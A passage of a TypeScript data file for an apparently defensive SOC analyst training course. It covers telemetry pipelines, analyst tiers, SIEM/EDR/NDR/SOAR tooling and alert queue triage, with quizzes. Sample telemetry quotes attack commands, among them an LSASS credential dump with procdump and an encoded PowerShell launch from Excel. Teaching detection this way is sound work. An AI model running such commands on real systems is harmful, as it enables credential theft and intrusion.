import { VisualStoryStep } from '@/components/learning/visual-story-demo';
import { InvestigationEvidenceCard } from '@/components/learning/interactive-investigation';
import { DragDropItem } from '@/components/learning/drag-drop-check';
import { MatchPair } from '@/components/learning/matching-check-shuffled';
import { TriageScenario } from '@/components/learning/tp-fp-triage';

export interface TopicContent {
  id: string;
  unitId: string;
  title: string;
  order: number;
  estimatedMinutes: number;
  xpReward: number;

  // 1. Theory (4-6 lines concise explanation + Know More)
  theory: {
    summaryLines: string[];
    knowMore: {
      title: string;
      description: string;
      externalUrl: string;
      externalLabel: string;
    };
  };

  // 2. Demo (Visual story / video-like animation: watch & understand)
  demo: {
    title: string;
    subtitle: string;
    steps: VisualStoryStep[];
  };

  // 3. Interactive (Hands-on investigation: click & engage)
  interactive: {
    title: string;
    scenario: string;
    cards: InvestigationEvidenceCard[];
  };

  // 4. Real-world SOC Context
  socContext: {
    title: string;
    scenario: string;
    analystMindset: string;
    bestPractices: string[];
  };

  // 5. Knowledge Checks (Varied interactive formats)
  knowledgeCheck: {
    dragDrop?: {
      title: string;
      instructions: string;
      items: DragDropItem[];
      explanation: string;
    };
    matching?: {
      title: string;
      instructions: string;
      pairs: MatchPair[];
      explanation: string;
    };
    triageScenario?: TriageScenario;
  };
}

export interface UnitAssessmentQuestion {
  id: string;
  question: string;
  options: string[];
  correctAnswer: number;
  explanation: string;
}

export interface UnitStructure {
  id: string;
  unitNumber: number;
  title: string;
  description: string;
  estimatedHours: number;
  topics: TopicContent[];
  assessment: {
    id: string;
    title: string;
    passingScore: number;
    xpReward: number;
    questions: UnitAssessmentQuestion[];
  };
}

export const MODULE_04_UNITS: UnitStructure[] = [
  {
    id: 'unit-1',
    unitNumber: 1,
    title: 'Unit 1: SOC Architecture & Foundations',
    description: 'Understand core SOC structures, data ingestion pipelines, analyst tiers, and technology ecosystem.',
    estimatedHours: 2,
    topics: [
      {
        id: 'topic-1-1',
        unitId: 'unit-1',
        title: 'SOC Architecture & Data Flow',
        order: 1,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'A Security Operations Center (SOC) operates as the cyber defense command hub for an enterprise.',
            'Telemetry generated by firewalls, endpoints, servers, and cloud providers flows continuously into collection agents.',
            'Raw logs are ingested, normalized into common schemas, and correlated by the SIEM against detection logic.',
            'When suspicious patterns match alert thresholds, actionable alerts are dispatched to the analyst triage queue.',
            'Understanding this complete pipeline allows L1 analysts to trace alerts back to root telemetry and network topography.',
          ],
          knowMore: {
            title: 'NIST Computer Security Incident Handling Guide (SP 800-61 Rev. 2)',
            description: 'Official federal guidelines on establishing incident response capabilities and operational SOC architectures.',
            externalUrl: 'https://csrc.nist.gov/pubs/sp/800/61/r2/final',
            externalLabel: 'NIST SP 800-61 Documentation',
          },
        },
        demo: {
          title: 'Visual Story: The Enterprise Telemetry to Alert Pipeline',
          subtitle: 'Follow how security events travel from endpoint generation to the SIEM and analyst queue (Watch & Understand)',
          steps: [
            {
              id: 1,
              stage: '1. Endpoint Event',
              iconName: 'endpoint',
              title: 'Adversary Executes Encoded PowerShell',
              description: 'An attacker uses a macro to spawn powershell.exe with Base64 encoded payload on an executive workstation.',
              telemetrySnippet: 'Event ID 4688: Process Creation\nParentProcessName: C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\nNewProcessName: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nCommandLine: powershell.exe -enc SQBYAE0A...',
              highlightText: 'Office spawning a script interpreter is an anomalous parent-child process relationship.',
            },
            {
              id: 2,
              stage: '2. Log Ingestion',
              iconName: 'server',
              title: 'Log Collector Forwards Sysmon & Security Logs',
              description: 'Forwarder agent collects Windows Event 4688 and Sysmon Event 1, encrypts payload, and pushes to cloud collector.',
              telemetrySnippet: 'Forwarder Agent Status: 200 OK\nProtocol: TLS 1.3 / Port 6514\nIngestion Rate: 4,200 EPS\nDestination: Sentinel Log Analytics Workspace',
              highlightText: 'Central forwarders buffer and transport logs even during network interruptions.',
            },
            {
              id: 3,
              stage: '3. SIEM Parsing',
              iconName: 'siem',
              title: 'Normalization into Unified Schema',
              description: 'The SIEM parses raw XML fields into standard fields: TargetUser, ProcessName, Hash, and Hostname.',
              telemetrySnippet: 'Normalized Entity Table:\nDeviceVendor: Microsoft\nDeviceEventClassID: 4688\nActor: j.doe\nProcessPath: C:\\Windows\\System32\\powershell.exe',
              highlightText: 'Normalization enables unified correlation rules across different operating systems.',
            },
            {
              id: 4,
              stage: '4. Rule Trigger',
              iconName: 'attacker',
              title: 'Correlation Rule Matches MITRE T1059.001',
              description: 'Rule "Suspicious Process Spawned from Office Application" detects macro execution pattern and generates alert.',
              telemetrySnippet: 'Rule ID: SEC-ALERT-5012\nSeverity: HIGH\nMitreTactic: Execution\nMitreTechnique: T1059.001 (PowerShell)',
              highlightText: 'Detection rules match behavior, not just static file signatures.',
            },
            {
              id: 5,
              stage: '5. Triage Queue',
              iconName: 'analyst',
              title: 'Alert Appears on Analyst Dashboard',
              description: 'Alert is routed to the L1 SOC Analyst queue with enriched endpoint details and a 30-minute SLA.',
              telemetrySnippet: 'Incident #9021\nAssigned: L1 Tier\nSLA: 30 Minutes\nHost: FIN-WS-09\nUser: j.doe',
              highlightText: 'The L1 analyst acknowledges the ticket and begins forensic triage.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Investigation: Trace Data Flow in Suspicious Execution',
          scenario: 'A perimeter alert has been triggered. Click each of the 4 evidence cards to inspect the audit artifacts.',
          cards: [
            {
              id: 'c1-user',
              category: 'User',
              label: 'User Account: j.doe (Executive Assistant)',
              summary: 'Standard non-privileged user who opened an email attachment titled Q3_Financial_Bonus.xlsm.',
              detailedFindings: 'User was logged on via interactive console (LogonType 2). No admin privileges requested or granted.',
              severityIndicator: 'Normal',
            },
            {
              id: 'c1-ip',
              category: 'Source IP',
              label: 'C2 Network Destination: 203.0.113.88:443',
              summary: 'Outbound TCP connection attempted immediately after PowerShell spawned.',
              detailedFindings: 'Destination IP has 0 prior enterprise history. Threat intelligence flags host as Cobalt Strike beacon listener.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c1-event',
              category: 'Event ID',
              label: 'Sysmon Event 1: Process Creation',
              summary: 'powershell.exe spawned with -WindowStyle Hidden -ExecutionPolicy Bypass.',
              detailedFindings: 'Command line decoded to an In-Memory WebClient download string targeting 203.0.113.88.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c1-timeline',
              category: 'Timeline',
              label: 'Sequence: 09:12:01 to 09:12:08',
              summary: 'Excel spawned PowerShell at 09:12:01. Outbound beacon attempt at 09:12:04. Firewall blocked connection at 09:12:05.',
              detailedFindings: 'Egress filtering blocked port 443 to the unclassified IP. Machine requires immediate EDR host isolation.',
              severityIndicator: 'Suspicious',
            },
          ],
        },
        socContext: {
          title: 'Real-World Analyst Reality: Log Delays & Clock Skew',
          scenario: 'During live triage, analysts frequently encounter timestamps that differ across perimeter firewalls, domain controllers, and cloud tenants.',
          analystMindset: 'Always convert every artifact to UTC (Coordinated Universal Time). Never rely on local workstation clocks when correlating multi-system events.',
          bestPractices: [
            'Standardize all log sources to UTC with automated NTP synchronization.',
            'Verify log ingestion lag — if telemetry arrives 15 minutes late, your detection is already 15 minutes behind the adversary.',
            'Always inspect parent processes when examining script execution (e.g. cmd.exe vs excel.exe).',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Enterprise Data Flow Pipeline',
            instructions: 'Order the steps from raw endpoint event creation to L1 queue assignment.',
            items: [
              { id: 'step-1', label: '1. Event Generated on Endpoint (Audit Failure/Process Create)', order: 1 },
              { id: 'step-2', label: '2. Log Forwarder Agents Encrypt and Transport Telemetry', order: 2 },
              { id: 'step-3', label: '3. SIEM Parser Normalizes Fields into Standard Schema', order: 3 },
              { id: 'step-4', label: '4. Correlation Engine Matches Behavior Against Detection Logic', order: 4 },
              { id: 'step-5', label: '5. Enriched Security Alert Dispatched to L1 Analyst Queue', order: 5 },
            ],
            explanation: 'Security data must be captured locally, forwarded across the network, parsed into common fields, evaluated by rules, and only then surfaced as an actionable alert.',
          },
          matching: {
            title: 'Match Telemetry Components to Operational Roles',
            instructions: 'Match the left architectural elements with their correct operational purpose on the right.',
            pairs: [
              { id: 'm-1', left: 'Log Collector / Forwarder', right: 'Reliably buffers and ships raw logs across networks' },
              { id: 'm-2', left: 'SIEM Normalization Engine', right: 'Transforms disparate vendor schemas into unified fields' },
              { id: 'm-3', left: 'Correlation Detection Rules', right: 'Evaluates multi-event conditions against threat patterns' },
              { id: 'm-4', left: 'L1 Triage Alert Queue', right: 'Displays prioritized tickets for analyst human review' },
            ],
            explanation: 'Each architectural component serves a distinct function in preventing log loss, standardizing attributes, detecting threats, and facilitating human response.',
          },
        },
      },
      {
        id: 'topic-1-2',
        unitId: 'unit-1',
        title: 'Analyst Roles, Tiers & Escalation',
        order: 2,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Security operations centers rely on a structured tiered hierarchy to balance speed, volume, and analytical depth.',
            'Tier 1 (L1) Analysts manage the front lines, triaging alerts, filtering false positives, and scoping initial severity.',
            'Tier 2 (L2) Incident Responders handle confirmed incidents, perform deep-dive forensics, and coordinate containment.',
            'Tier 3 (L3) Senior Analysts conduct proactive threat hunting, reverse engineer malware, and tune detection rules.',
            'Clean escalation criteria and clear handoff documentation prevent critical alerts from stalling or being mishandled.',
          ],
          knowMore: {
            title: 'SANS Institute: Building a World-Class Security Operations Center',
            description: 'Comprehensive research on tier division, escalation metrics, and fatigue reduction in modern SOC teams.',
            externalUrl: 'https://www.sans.org/white-papers/37775/',
            externalLabel: 'SANS SOC Architecture Whitepaper',
          },
        },
        demo: {
          title: 'Visual Story: The Tier Escalation Lifecycle',
          subtitle: 'Observe how a complex threat moves from L1 initial triage up to L2 containment and L3 rule tuning',
          steps: [
            {
              id: 1,
              stage: '1. L1 Queue Ingestion',
              iconName: 'siem',
              title: 'L1 Analyst Acknowledges Critical Alert',
              description: 'Alert "LSASS Memory Dump Attempt" is claimed by L1 analyst within 5 minutes of ingestion.',
              telemetrySnippet: 'Queue: Inbound Alert\nRule: Credential Dumping (T1003.001)\nTarget: SERVER-SQL-PROD\nClaimed By: Analyst_L1_Chen',
              highlightText: 'Fast acknowledgment ensures strict adherence to enterprise SLAs.',
            },
            {
              id: 2,
              stage: '2. L1 Evidence Scoping',
              iconName: 'analyst',
              title: 'L1 Confirms True Positive Evidence',
              description: 'L1 verifies that procdump.exe was executed by an unrecognized local account. True positive confirmed.',
              telemetrySnippet: 'L1 Findings:\n1. Command: procdump.exe -ma lsass.exe lsass.dmp\n2. User: localadmin_temp\n3. File created in C:\\Windows\\Temp\\lsass.dmp\nVerdict: Confirmed True Positive',
              highlightText: 'L1 compiles core IOCs before triggering escalation to Tier 2.',
            },
            {
              id: 3,
              stage: '3. L2 Incident Escalation',
              iconName: 'server',
              title: 'L2 Responder Executes Isolation Playbook',
              description: 'L2 receives the structured ticket, isolates SERVER-SQL-PROD via EDR, and pulls memory capture.',
              telemetrySnippet: 'EDR Action: Host Isolated from Network\nLive Connections Dropped: 14\nMemory Dump Size: 16.4 GB\nTicket Status: Active Incident (P1)',
              highlightText: 'L2 handles containment, live response, and eradication protocols.',
            },
            {
              id: 4,
              stage: '4. L3 Threat Hunting',
              iconName: 'attacker',
              title: 'L3 Hunts for Enterprise-Wide Spread',
              description: 'L3 analyzes the threat actor tool hash across all 5,000 corporate endpoints to check for lateral movement.',
              telemetrySnippet: 'Fleet Query:\nDeviceFileEvents | where SHA256 == "e3b0c442..."\nMatches Found: 2 additional endpoints (HR-WS-02, FINANCE-SRV-01)\nPlaybook: Mass account credential revocation',
              highlightText: 'L3 proactively sweeps the entire enterprise for hidden persistence.',
            },
            {
              id: 5,
              stage: '5. Detection Tuning',
              iconName: 'siem',
              title: 'Feedback Loop Updates Detection Rules',
              description: 'Detection engineer updates SIEM correlation logic to alert on any access to lsass.exe memory in real time.',
              telemetrySnippet: 'Rule Updated: WIN-PROC-LSASS-ACCESS\nStatus: Active in Production\nSeverity: High',
              highlightText: 'Every incident feeds back into platform resilience and automated defenses.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Triage: Match Incidents to the Proper SOC Tier',
          scenario: 'Examine each alert scenario card and identify whether it should be resolved by L1, escalated to L2, or referred to L3.',
          cards: [
            {
              id: 'c2-l1',
              category: 'User',
              label: 'Single User Password Mistype (4625 followed by 4624)',
              summary: 'User mistyped password twice, then successfully authenticated from their standard laptop.',
              detailedFindings: 'Standard benign user behavior. Document as False Positive and close at Tier 1 without escalation.',
              severityIndicator: 'Normal',
            },
            {
              id: 'c2-l2',
              category: 'Event ID',
              label: 'Ransomware Canary File Renamed on File Server',
              summary: 'Decoy canary file altered with .locked extension. Active encryption detected.',
              detailedFindings: 'Immediate high-severity incident. Requires host isolation, L2 emergency response, and backup verification.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c2-l3',
              category: 'Source IP',
              label: 'Unattributed DLL Sideloading Across 4 Domain Controllers',
              summary: 'Stealthy persistence mechanism detected across multiple mission-critical servers.',
              detailedFindings: 'Advanced persistent threat tradecraft. Requires L3 malware reverse engineering and fleet-wide hunting.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c2-timeline',
              category: 'Timeline',
              label: 'Phishing Email Link Click with Zero-Day Payload',
              summary: 'User submitted credentials on external harvest page; unknown binary dropped.',
              detailedFindings: 'L1 scopes user impact, then escalates to L2 for session termination and password reset.',
              severityIndicator: 'Suspicious',
            },
          ],
        },
        socContext: {
          title: 'Analyst Handoff Pitfalls: What Causes Escalation Failure',
          scenario: 'When L1 escalates an incident with vague notes ("looks suspicious, please check"), L2 is forced to repeat the entire investigation from scratch.',
          analystMindset: 'A professional L1 escalation includes the 5 Ws: Who (target user), What (command/file), Where (hostname/IP), When (exact UTC timeline), and Why (the specific evidence proving maliciousness).',
          bestPractices: [
            'Never escalate without including the primary source Event ID and full command line.',
            'Attach the exact KQL/SIEM search query you used so L2 can reproduce your results in 1 click.',
            'Clearly mark the containment action taken (e.g. host isolated vs still online).',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Tiered Escalation Workflow',
            instructions: 'Order the steps an alert takes from initial arrival to closure and tuning.',
            items: [
              { id: 't-1', label: '1. L1 Acknowledges Alert and Reviews Baseline Evidence', order: 1 },
              { id: 't-2', label: '2. L1 Confirms True Positive and Compiles 5-W Incident Summary', order: 2 },
              { id: 't-3', label: '3. L2 Receives Escalation and Executes Host Isolation Playbook', order: 3 },
              { id: 't-4', label: '4. L3 Sweeps Fleet for Lateral Movement and Persistence', order: 4 },
              { id: 't-5', label: '5. Post-Incident Review Feeds New Detection Rules into SIEM', order: 5 },
            ],
            explanation: 'The structured escalation pipeline ensures each tier applies their specific expertise without duplicating preliminary triage.',
          },
          matching: {
            title: 'Match SOC Tiers to Primary Responsibilities',
            instructions: 'Connect each tier with their defining daily operational focus.',
            pairs: [
              { id: 'tier-1', left: 'Tier 1 (L1) Analyst', right: 'Alert triage, false positive elimination, SLA adherence' },
              { id: 'tier-2', left: 'Tier 2 (L2) Responder', right: 'Incident containment, host isolation, digital forensics' },
              { id: 'tier-3', left: 'Tier 3 (L3) Hunter', right: 'Proactive threat hunting, malware analysis, rule tuning' },
              { id: 'tier-mgr', left: 'SOC Operations Manager', right: 'Metrics (MTTD/MTTR), staffing, client stakeholder communications' },
            ],
            explanation: 'Clean division of labor prevents alert fatigue for senior responders while ensuring entry analysts have clear guardrails.',
          },
        },
      },
      {
        id: 'topic-1-3',
        unitId: 'unit-1',
        title: 'The SOC Technology Stack',
        order: 3,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Modern SOCs integrate five core technology families: SIEM, EDR, NDR, SOAR, and Threat Intelligence.',
            'SIEM centralizes and correlates multi-source log data across all infrastructure layers.',
            'EDR provides deep operating system visibility, process genealogy, memory inspection, and containment controls.',
            'NDR monitors raw packet telemetry and encrypted traffic metadata to spot command-and-control beacons.',
            'SOAR binds these tools together through automated playbooks that accelerate repetitive enrichment tasks.',
          ],
          knowMore: {
            title: 'CISA Security Operations and Threat Hunting Architecture',
            description: 'Guidance from the Cybersecurity and Infrastructure Security Agency on integrating SIEM, EDR, and NDR tooling.',
            externalUrl: 'https://www.cisa.gov/resources-tools/services',
            externalLabel: 'CISA Operational Guidelines',
          },
        },
        demo: {
          title: 'Visual Story: The Integrated Security Stack in Action',
          subtitle: 'Watch how SIEM, EDR, NDR, and SOAR collaborate simultaneously on a single threat',
          steps: [
            {
              id: 1,
              stage: '1. NDR Traffic Flag',
              iconName: 'server',
              title: 'NDR Flags Unusual DNS Beaconing',
              description: 'Network sensors observe host sending DNS TXT queries every 5 seconds to randomized subdomains.',
              telemetrySnippet: 'NDR Alert: DNS Tunneling (T1071.004)\nSource: 10.0.4.19\nQuery: 7a8f9c1b.malicious-domain.com (TXT)\nEntropy: 4.88 (High randomness)',
              highlightText: 'Network telemetry detects the covert communication channel.',
            },
            {
              id: 2,
              stage: '2. EDR Process Tie',
              iconName: 'endpoint',
              title: 'EDR Pinpoints Malicious Process PID',
              description: 'EDR telemetry maps the DNS activity directly to svchost.exe being injected by an unsigned binary.',
              telemetrySnippet: 'EDR Telemetry:\nProcess: C:\\Windows\\System32\\svchost.exe (PID 4812)\nInjected By: C:\\Users\\Public\\update.exe (SHA256: d24f...)\nAction: Injected thread created in remote process',
              highlightText: 'EDR links network events directly to exact processes and parent binaries.',
            },
            {
              id: 3,
              stage: '3. SIEM Correlation',
              iconName: 'siem',
              title: 'SIEM Combines Network & Host Data',
              description: 'The SIEM correlates the NDR alert with the EDR process event into a single high-priority composite incident.',
              telemetrySnippet: 'Composite Incident #4088\nScore: 98/100 (Critical)\nEvidence: DNS Tunneling + Process Injection\nHost: WORKSTATION-ACCT-04',
              highlightText: 'Correlating network and host data eliminates duplicate alerts.',
            },
            {
              id: 4,
              stage: '4. SOAR Playbook Execution',
              iconName: 'analyst',
              title: 'SOAR Pre-Enriches Threat Intelligence',
              description: 'SOAR playbook queries VirusTotal and AlienVault, attaching threat reports to the ticket in 4 seconds.',
              telemetrySnippet: 'SOAR Automation Results:\n1. update.exe flagged by 54/72 engines (Cobalt Strike)\n2. Domain registered 48 hours ago in Russia\n3. Pre-triage checklist completed automatically',
              highlightText: 'Automating enrichment saves the analyst 15 minutes of manual lookups.',
            },
            {
              id: 5,
              stage: '5. Analyst Containment',
              iconName: 'analyst',
              title: 'Analyst Approves Isolation with 1 Click',
              description: 'Analyst reviews the correlated dossier and hits "Approve Host Isolation" to sever the C2 connection.',
              telemetrySnippet: 'EDR Response: Host 10.0.4.19 Isolated.\nDNS Beaconing: Terminated.\nAnalyst Ticket: Updated and assigned for re-imaging.',
              highlightText: 'Human analyst makes the decision; tooling executes containment instantaneously.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Stack Triage: Which Tool Provides the Missing Evidence?',
          scenario: 'You are investigating an alert. Click the 4 artifact cards to determine which tool of the SOC stack captures each artifact.',
          cards: [
            {
              id: 'c3-siem',
              category: 'Event ID',
              label: 'Multi-host Failed Logins Across 20 Servers',
              summary: 'Correlating authentication events across 20 distinct Domain Controllers.',
              detailedFindings: 'Captured by SIEM. Endpoints only see their local events; only the SIEM correlates across the entire domain.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'c3-edr',
              category: 'User',
              label: 'Memory Injection into lsass.exe Process',
              summary: 'A suspicious binary opened a handle with PROCESS_ALL_ACCESS.',
              detailedFindings: 'Captured by EDR. Kernel-level endpoint sensor monitors process memory structures and handles in real time.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c3-ndr',
              category: 'Source IP',
              label: 'Encrypted TLS SNI Beaconing to Newly Registered Domain',
              summary: 'Uninspected TLS session showing heartbeat communication pattern.',
              detailedFindings: 'Captured by NDR. Network sensors analyze packet timing, certificate metadata, and encrypted traffic flows.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'c3-soar',
              category: 'Timeline',
              label: 'Automated IP Reputation & Ticket Assignment',
              summary: 'Querying external threat feeds and assigning ticket to on-duty analyst in under 5 seconds.',
              detailedFindings: 'Handled by SOAR. Orchestration playbooks automate repetitive API lookups and routing workflows.',
              severityIndicator: 'Normal',
            },
          ],
        },
        socContext: {
          title: 'Vendor Buzzwords vs Operational Reality',
          scenario: 'Vendors often claim their single tool replaces all others. In reality, no single tool covers host, network, cloud, and identity equally.',
          analystMindset: 'A seasoned SOC analyst treats each tool as a specialized lens: EDR is your microscope for endpoints; NDR is your radar for the wire; SIEM is your central command map.',
          bestPractices: [
            'Never declare an incident resolved using only one tool — cross-reference host and network evidence.',
            'Ensure EDR agents are deployed on 100% of managed workstations and servers; blind spots become adversary sanctuaries.',
            'Routinely verify that SOAR automation playbooks fail gracefully if external APIs go down.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Security Tool Workflow During an Intrusion',
            instructions: 'Order how different technologies detect, correlate, and respond to an intrusion.',
            items: [
              { id: 'tool-1', label: '1. NDR Flags Encrypted Outbound Network Beaconing', order: 1 },
              { id: 'tool-2', label: '2. EDR Identifies Injected Process Spawning the Connection', order: 2 },
              { id: 'tool-3', label: '3. SIEM Correlates Network & Host Telemetry into Unified Ticket', order: 3 },
              { id: 'tool-4', label: '4. SOAR Playbook Automatically Enriches Threat Intel Reputations', order: 4 },
              { id: 'tool-5', label: '5. Analyst Approves Host Isolation via EDR Console', order: 5 },
            ],
            explanation: 'The modern SOC stack functions as an interconnected ecosystem, linking raw traffic to host processes and automated remediation.',
          },
          matching: {
            title: 'Match Core SOC Technologies to Their Primary Sensor Domain',
            instructions: 'Connect each acronym with its primary sensor vantage point.',
            pairs: [
              { id: 'tech-siem', left: 'SIEM (Splunk / Sentinel)', right: 'Central log aggregation, parsing, and multi-source correlation' },
              { id: 'tech-edr', left: 'EDR (CrowdStrike / Defender)', right: 'Endpoint kernel telemetry, process trees, and host isolation' },
              { id: 'tech-ndr', left: 'NDR (Zeek / ExtraHop)', right: 'Network wire metadata, packet inspection, and beacon detection' },
              { id: 'tech-soar', left: 'SOAR (Cortex / Phantom)', right: 'Automated workflow playbooks, API connectors, and enrichment' },
            ],
            explanation: 'Understanding the strengths of each platform is fundamental for efficient investigation and rapid triage.',
          },
        },
      },
    ],
    assessment: {
      id: 'unit-1-assessment',
      title: 'Unit 1 Assessment: SOC Architecture & Operational Foundations',
      passingScore: 80,
      xpReward: 200,
      questions: [
        {
          id: 'u1-q1',
          question: 'What is the primary role of a Tier 1 (L1) SOC Analyst?',
          options: [
            'Reverse engineer zero-day malware binaries in a sandbox',
            'Triage incoming alerts, eliminate false positives, and scope initial severity',
            'Conduct high-level board briefings on annual cybersecurity spend',
            'Manage physical building security access controls and CCTV cameras',
          ],
          correctAnswer: 1,
          explanation: 'L1 analysts represent the front line: triaging alert queues, filtering benign false positives, and escalating verified incidents.',
        },
        {
          id: 'u1-q2',
          question: 'Why is log normalization a critical step within a SIEM pipeline?',
          options: [
            'It compresses log files so they consume 0 disk space',
            'It translates diverse vendor-specific log formats into unified, searchable attributes',
            'It deletes all failed logon attempts to keep the database small',
            'It changes all user passwords across the enterprise automatically',
          ],
          correctAnswer: 1,
          explanation: 'Normalization maps disparate fields (e.g. src_ip, SourceAddress, c-ip) into a single standard schema for universal correlation.',
        },
        {
          id: 'u1-q3',
          question: 'Which tool provides kernel-level process tracking and remote host isolation capabilities?',
          options: ['SIEM', 'EDR', 'NDR', 'Firewall'],
          correctAnswer: 1,
          explanation: 'Endpoint Detection and Response (EDR) agents sit on the endpoint operating system, enabling deep process tracing and host containment.',
        },
        {
          id: 'u1-q4',
          question: 'When escalating an alert to Tier 2, what information must an L1 analyst include?',
          options: [
            'Only the ticket ID and a note saying "check this"',
            'The 5 Ws: Who, What, Where, When (UTC), and exact evidence proving maliciousness',
            'A request to wipe the server immediately without checking evidence',
            'A screenshot of their personal desktop background',
          ],
          correctAnswer: 1,
          explanation: 'Thorough documentation with timestamps, users, hosts, and specific indicators allows Tier 2 to act immediately without repeating triage.',
        },
        {
          id: 'u1-q5',
          question: 'What does SOAR primarily add to a security operations center?',
          options: [
            'It replaces all human analysts with autonomous AI that needs no supervision',
            'It automates repetitive triage tasks and connects tools via API playbooks',
            'It provides physical perimeter defense barriers for corporate buildings',
            'It manages company payroll and financial auditing spreadsheets',
          ],
          correctAnswer: 1,
          explanation: 'Security Orchestration, Automation, and Response (SOAR) automates enrichment and repetitive actions via programmatic playbooks.',
        },
      ],
    },
  },

  {
    id: 'unit-2',
    unitNumber: 2,
    title: 'Unit 2: Alert Triage & Evidence Investigation',
    description: 'Master alert ingestion, artifact extraction, and realistic True Positive vs False Positive evidence determination.',
    estimatedHours: 2.5,
    topics: [
      {
        id: 'topic-2-1',
        unitId: 'unit-2',
        title: 'Alert Ingestion & Queue Management',
        order: 1,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Alert triage begins the instant a security ticket enters the centralized monitoring queue.',
            'Analysts must adhere strictly to Service Level Agreements (SLAs) governed by alert severity rating.',
            'Initial queue management requires quick validation of alert telemetry before deep forensic analysis begins.',
            'Grouping correlated alerts prevents duplicate investigation and surfaces broader adversary campaigns.',
            'Systematic queue discipline ensures critical threats are addressed within minutes while managing high alert volumes.',
          ],
          knowMore: {
            title: 'NIST Incident Handling Guide - Detection and Analysis Phase',
            description: 'Standardized protocols for establishing alert validation baselines and queue priority matrixes.',
            externalUrl: 'https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final',
            externalLabel: 'NIST SP 800-61 Section 3',
          },
        },
        demo: {
          title: 'Visual Story: High-Volume Alert Queue Prioritization',
          subtitle: 'Watch how an experienced analyst triages an alert queue containing multiple concurrent alerts',
          steps: [
            {
              id: 1,
              stage: '1. Ingestion Queue',
              iconName: 'siem',
              title: 'Queue Flooded with 24 New Alerts',
              description: 'Morning shift arrives with 24 unassigned alerts ranging from Informational to Critical.',
              telemetrySnippet: 'Queue Snapshot:\n- 2x Critical (Ransomware canary, Domain Admin created)\n- 5x High (Brute force, Mimikatz)\n- 17x Medium/Low (Certificate expiration, Port scan)',
              highlightText: 'Severity classification determines immediate triage order.',
            },
            {
              id: 2,
              stage: '2. SLA Prioritization',
              iconName: 'analyst',
              title: 'Analyst Claims Critical Incident #1042',
              description: 'Analyst prioritizes the Critical alert with a 15-minute SLA clock running.',
              telemetrySnippet: 'Claimed: INC-1042 (Domain Admin Created)\nTarget: DC-CORP-01\nActor: svc_backup (Service Account)\nSLA Remaining: 13m 42s',
              highlightText: 'Critical SLAs take precedence over older, low-severity tickets.',
            },
            {
              id: 3,
              stage: '3. Grouping & Deduplication',
              iconName: 'server',
              title: 'Grouping Related Alerts',
              description: 'Analyst notices 4 other alerts from DC-CORP-01 over the past 30 minutes and merges them into one parent ticket.',
              telemetrySnippet: 'Merged Child Alerts:\n- 4720: User Account Created\n- 4728: Member Added to Security Group (Domain Admins)\n- 4672: Special Privileges Assigned',
              highlightText: 'Merging related alerts uncovers the full attack progression.',
            },
            {
              id: 4,
              stage: '4. Service Account Context',
              iconName: 'endpoint',
              title: 'Checking Authorization Baseline',
              description: 'Analyst checks enterprise change management tickets: Is there an approved maintenance window for svc_backup?',
              telemetrySnippet: 'Change Management Portal:\nSearch: svc_backup | Target: DC-CORP-01\nResults: No approved change requests found for today.',
              highlightText: 'Unscheduled privilege escalation by a service account is a severe red flag.',
            },
            {
              id: 5,
              stage: '5. Escalation & Ticket Disposition',
              iconName: 'analyst',
              title: 'Ticket Marked True Positive & Escalated to P1',
              description: 'Analyst marks incident as True Positive Privilege Escalation and dials the on-call Incident Response lead.',
              telemetrySnippet: 'Ticket Updated: P1 Critical Incident\nAssigned: L2 Lead Responder\nPhone Notification: Dispatched',
              highlightText: 'Proper queue management caught active domain compromise in 8 minutes.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Queue Priority: Order Alerts by SLA Urgency',
          scenario: 'You have 4 unassigned alerts in your queue. Click each card to evaluate its severity, SLA timeframe, and risk.',
          cards: [
            {
              id: 'q-crit',
              category: 'User',
              label: 'Critical: Domain Controller LSASS Memory Accessed',
              summary: 'SLA: 15 Minutes. Potential credential harvesting on core enterprise authentication server.',
              detailedFindings: 'Highest risk scenario. An attacker dumping credentials on a DC can compromise the entire forest within minutes.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'q-high',
              category: 'Event ID',
              label: 'High: Outbound C2 Beaconing on Port 443',
              summary: 'SLA: 30 Minutes. Workstation sending rhythmic heartbeat beacon to newly registered Russian domain.',
              detailedFindings: 'Active persistent backdoor established. Needs triage immediately after the critical DC alert.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'q-med',
              category: 'Source IP',
              label: 'Medium: Internal Port Scan from Developer Machine',
              summary: 'SLA: 2 Hours. Host 10.0.12.44 scanned subnet for open SSH and SMB ports.',
              detailedFindings: 'Could be internal reconnaissance or a developer testing local Docker network configurations.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'q-low',
              category: 'Timeline',
              label: 'Low: Single User Account Lockout (3 Failed Logins)',
              summary: 'SLA: 8 Hours. Standard user forgot password after return from weekend vacation.',
              detailedFindings: 'Lowest operational risk. Review user history, verify with helpdesk, and close when validated.',
              severityIndicator: 'Normal',
            },
          ],
        },
        socContext: {
          title: 'Alert Fatigue & The Perils of Cherry-Picking',
          scenario: 'Tired analysts often "cherry-pick" easy low-severity tickets because they are fast to close, leaving complex high-severity alerts sitting in the queue.',
          analystMindset: 'A disciplined analyst always works top-down based on severity and SLA timer, never by ease of resolution.',
          bestPractices: [
